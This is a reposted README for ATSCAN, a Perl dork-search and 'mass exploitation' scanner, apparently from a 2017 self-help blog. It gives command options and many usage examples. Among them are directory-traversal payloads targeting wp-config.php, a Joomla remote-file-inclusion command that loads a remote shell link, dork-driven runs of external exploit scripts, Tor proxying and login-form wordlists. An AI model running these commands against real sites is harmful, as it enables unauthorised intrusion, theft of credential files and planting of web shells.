IT Online Self Help Resources : ATSCAN SCANNER

ATSCAN SCANNER

Advanced Search / Dork / Mass Exploitation Scanner

Tool:	ATSCAN version 12.1
Codename:	Anon4t
AUTHOR:	Ali MEHDIOUI
YOUTUBE:	youtube.com/c/AlisamTechnology

★ Description:

● Search engine Google / Bing / Ask / Yandex / Sogou
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Extern commands execution.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress and Joomla sites in the server.
● Find Admin page.
● Decode / Encode Base64 / MD5
● Ports scan.
● Extract IPs
● Extract E-mails.
● Auto detect errors.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● And more...

★ Libreries to install:

Perl Required.
Works in all platforms. Disponible in Blackarch linux and Dracos systems.

★ Download:

● git clone https://github.com/AlisamTechnology/ATSCAN
● direct link: https://github.com/AlisamTechnology/ATSCAN

★ Permissions:

cd ATSCAN
chmod +x ./atscan.pl

★ Installation:

chmod +x ./install.sh
./install.sh

★ Execution:

Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan

★ Uninstall Tool:

atscan --uninstall

★ Commands:

--help / -h / -?	Help.
--proxy	Set tor proxy for scans [EX: --proxy "socks://localhost:9050"] Set proxy [EX: --proxy "http://12.45.44.2:8080"] Set proxy list [EX: --proxy list.txt]
-m	Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
--proxy-random	Random proxy [EX: --proxy-random list.txt] or --proxy-random "socks://localhost:9050"]
--m-random	Random of all disponibles engines
--b-random	Random all disponibles agents
--freq	Random time frequency (in seconds)
--time	set browser time out
--dork / -d	Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
-t	Target
--level / -l	Scan level (+- Number of page results to scan)
-p	Set test parameter EX:id,cat,product_ID
--save / -s	Output.
--content	Print request content
--data	Post and Get forms. See examples
--post	Use post method
--get	Use get method
--header	Set headers
--host	Domain name [Ex: site.com]
--nobanner	Hide tool banner
--beep	Produce beep sound if positive scan found.
--ifend	Produce beep sound when scan process is finished.
--noinfo	Jump extra results info.
--noping	No host ping.
--limit	Limit max positive scan results.
--valid / -v	Validate by string
--status	Validate by http header status
--ifinurl	Get targets with exact string matching
--sregex	Get targets with exact regex matching
--unique	Get targets with exact dork matching
--replace	String to replace
--with	String to replace with
--full	--replace --full Will replace all url parametres from string to the end
--payload	Use your own payloads instead of tool ones
--exp	Exploit/Payload
--sql	Xss scan
--lfi	Local file inclusion
--joomrfi	Scan for joomla local file inclusion.
--shell	Shell link [Ex: http://www.site.com/shell.txt]
--wpafd	Scan wordpress sites for arbitery file download
--admin	Get site admin page
--shost	Get site subdomains
--tcp	TCP port
--udp	UDP port
--sites	Sites in the server
--wp	Wordpress sites in the server
--joom	Joomla sites in the server
--upload	Get sites with upload files in the server
--zip	Get sites with zip files in the server
--md5	Convert to md5
--encode64	Encode base64 string
--decode64	decode base64 string
--TARGET	Will be replaced by target in extern command
--HOST	Will be replaced by host in extern command
--HOSTIP	Will be replaced by host IP in extern command
--PORT	Will be replaced by open port in extern command
--ip	Crawl to get Ips
--regex	Crawl to get strings matching regex
--noquery	Remove string value from Query url [ex: site.com/index.php?id=string]
--command /-c	Extern Command to execute
--email	Get emails
rang(x-y)	EX: --exp "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql site.com/index.php?id=1 -> 9.
repeat(txt-y)	EX: --exp "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php" In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER]	To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE]	To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
--update	Update tool
--tool	Tool info.
--config	User configuration.
--pass	Set a password for tool use.
--uninstall	Uninstall Tool.

★ Examples:

● PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy list.txt Ex: --proxy my_proxies.txt

● RANDOM:
Random proxy --proxy-random [proxy list.txt]
Random browser --b-random
Random engine --m-random

● SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"

● SEARCH ENGINE:
Search: atscan --dork [dork> --level [level]
Search: atscan -d [dork> -l [level]
Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork> -l [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3> --level [level]
Search and rand: atscan -d [dork] -l [level] --exp "/index.php?id=rang(1-9)" --sql
Get Server sites: atscan -t [ip] --level [value] --sites
Get Server sites: atscan -t "[ip from]-[ip to]" --level [value] --sites
Get Server sites: atscan -t "ip1 [OTHER]ip2" --level [value] --sites
Get Server wordpress sites: atscan -t [ip] --level [value] --wp
Get Server joomla sites: atscan -t [ip] --level value] --joom
Get Server upload sites: atscan -t [ip] --level [value] --upload
Get Server zip sites files: atscan -t [ip] --level value] --zip
WP Arbitry File Download: atscan -t [ip] --level [[[value] --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell [shell link]
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ip

● REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'

● REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --exp "/index.php?id=rang(1-10)" --sql
atscan -t [target] --exp "/index.php?id=repeat(../-9)wp-config.php"

● PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

● ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

● DATA:
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]

● EXTERNAL COMMANDES:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET"

● MULTIPLE SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string] --with [string] --exp [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]

● USER PAYLOADS:
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]

● SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique

● SCAN VALIDATION:
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp [payload] --status [code] / --valid [string]
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]

● UPDATE TOOL:
atscan --update

● UNINSTALL TOOL:
atscan --uninstall

Sunday, June 11, 2017

ATSCAN SCANNER

ATSCAN SCANNER

Advanced Search / Dork / Mass Exploitation Scanner

No comments: